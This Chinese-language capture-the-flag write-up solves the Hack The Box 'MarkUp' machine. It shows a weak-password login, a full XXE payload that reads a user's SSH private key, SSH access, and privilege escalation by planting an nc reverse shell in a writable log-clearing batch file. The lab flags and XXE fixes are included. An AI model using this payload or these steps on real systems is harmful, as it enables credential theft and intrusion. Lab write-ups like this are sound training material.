HTB-MarkUp(XXE漏洞、SSH id

HTB-MarkUp(XXE漏洞、SSH id_rsa密钥)

news2024/11/15 15:59:25

前言

各位师傅大家好，我是qmx_07，今天给大家讲解MarkUp靶机

渗透过程

信息搜集

在这里插入图片描述

服务器开放了22SSH端口、80HTTP端口和 443HTTPS端口

弱口令登录后台

在这里插入图片描述

抓取http 数据包，进行加载账号密码字典
账号: admin
密码: password

利用XXE漏洞捕获SSH密钥

在这里插入图片描述

在后台Order页面，发现表单提交功能，使用XML提交数据
怀疑有XXE漏洞
通过查看页面源代码，发现用户名:Daniel

在这里插入图片描述

回显位置在标签
由于服务器开放了ssh服务，拥有id_rsa密钥，尝试读取
位置存放在:c:/users/用户/.ssh/id_rsa

payload:

<?xml version = "1.0"?>
<!DOCTYPE ANY [<!ENTITY test SYSTEM 'file:///c:/users/daniel/.ssh/id_rsa'>]>
<order>
    <quantity>
        111
    </quantity>
    <item>
        &test;
    </item>
    <address>
        11111
    </address>
</order>

在这里插入图片描述

成功读取id_rsa SSH密钥
DOCTYPE ANY 表示这个 XML 文档没有特定的文档类型限制
SYSTEM 读取本地文件，把内容放进test里面显示

在这里插入图片描述

保存id_rsa文件，最后一行要留空，否则可能无法读取密钥
将id_rsa设置为只读权限
r=4 w=2 x=1 读、写、运行

在这里插入图片描述

利用密钥，成功登录到服务器
-i 指定密钥

权限提升

在这里插入图片描述

翻找到C盘的Log-Mangement目录，发现一个痕迹清理的bat程序

# 关闭后面命令的输出
@echo off 
# 执行 bcdedit 命令 (并获取当前用户？) %%V 类似 for 循环的 i
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
# 判断用户是否是管理员 (为)
    IF (%adminTest%)==(Access) goto noAdmin
    	# wevtutil.exe 日志清理工具 系统自带 el列出事件日志
        for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
            echo.
            echo Event Logs have been cleared!
            goto theEnd
        # 回调函数 cl清理日志事件
        :do_clear
            wevtutil.exe cl %1
            goto :eof
        :noAdmin
            echo You must run this script as an Administrator!
    :theEnd
exit

在这里插入图片描述

Users 后面的（F）表示所有用户都有完全控制权限
开启http服务
下载nc64
拥有完全控制权限，将nc反弹命令写入，并执行
反弹会话为管理员权限
用户 flag:032d2fc8952a8c24e39c8f0ee9918ef7
root flag:f574a3e7650cebd8c39784299cb570f8
思路：job.bat拥有管理员权限，我们具有完全控制权限，进行修改反弹会话

知识点讲解

XXE原理：XXE漏洞就是xml外部实体注入漏洞，通常发生在应用程序解析xml输入时，没有禁止外部实体加载，导致恶意外部实体加载，造成文件读取，命令执行，内网端口扫描等危害
修复意见：
1.禁止加载外部实体
2.不允许XML中含有任何自己声明的DTD
id_rsa:私钥文件，与之对应的还有一个公钥文件（通常为id_rsa.pub）。在 SSH 连接中，服务器会保存客户端的公钥，当客户端尝试连接时，客户端使用私钥进行签名，服务器使用保存的公钥进行验证